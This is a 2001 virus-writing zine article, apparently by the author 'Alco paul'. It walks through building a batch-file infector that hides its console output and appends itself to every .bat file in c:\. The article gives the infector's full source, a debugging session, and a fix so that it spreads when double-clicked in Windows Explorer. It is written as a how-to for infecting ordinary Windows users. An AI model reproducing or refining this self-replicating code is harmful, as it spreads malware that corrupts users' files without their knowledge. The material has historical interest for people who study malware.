When the going gets weird the weird turn pro
| last article | table of contents | next article |
|---|
| last article | table of contents | next article |
|---|
Strange Article - Difference between executing batch files in MS-DOS prompt and in Windows Explorer by Alco paul
I just discovered this difference when I was testing the spawning process of my batch worm, Redirection...
Ei, a boring afternoon, nothing to do, can't code in any programming languages coz you're still learning how to, planned to write a batch file infector...
Type, takataktak, enter...
***************************
c:\>copy con infector.bat
@echo off
ctty nul
copy c:\*.bat+%0.bat
exit
^Z
***************************
Explanation:
**************************
c:\>copy con infector.bat ----> make our batch file
@echo off ----> turn the console output off and redirect it to null to prevent user interactions
ctty nul
copy c:\*.bat+%0.bat ----> copy the running batch file to all the batch files in c:\
exit -----> terminate the process
^Z -----> write file to disk
**************************
************************************************************
%0.bat is similar to App.EXEName & ".exe" in Visual Basic...
************************************************************
Running infector.bat in MS-DOS prompt will produce our desired result.
It will copy itself to all the batch files in c:\
:)
But when it's run in Windows Explorer, by clicking the icon of infector.bat, it won't copy itself to c:\*.bat
:(
Why?
Let's examine...
*********************
c:\>copy con bug.bat
copy c:\*.bat+%0.bat
^Z
*********************
Let's not include @echo off and ctty nul to see what's happening to bug.bat while it executes..
Click Explorer.. Type c:\ in the address bar and click Go...
It'll display the icons of all the files in c:\.. Click bug and see what'll happen..
------------------------------------------------
Finished - bug
------------------------------------------------
C:\>copy c:\*.bat+C:\BUG.BAT.bat
c:\h.bat
C:\BUG.BAT.bat
File not found - C:\BUG.BAT.bat
Content of destination lost before copy
Content of destination lost before copy
0 file(s) copied
C:\>
------------------------------------------------
{!} Surely, no files will be copied to c:\*.bat because BUG.BAT.bat doesn't exist...
When clicking, Windows Explorer adds another extension to our file bug.bat making it bug.bat.bat and executes bug.bat.bat....
Ask Microsoft why..
To fix the problem, instead of %0.bat, make it %0
***************************
c:\>copy con infector.bat
@echo off
ctty nul
copy c:\*.bat+%0
exit
^Z
***************************
Go to Windows Explorer, click infector.bat and we'll achieve our desired goal, infecting all the batch files in c:\
The drawback, you won't be able to infect c:\*.bat when you run the modified infector.bat in MS-DOS prompt...
But remember this, NO Windows User will think of executing a file in MS-DOS prompt.....
Think.. :)
Alcopaul
12/19/2001
Bugs found? Email me.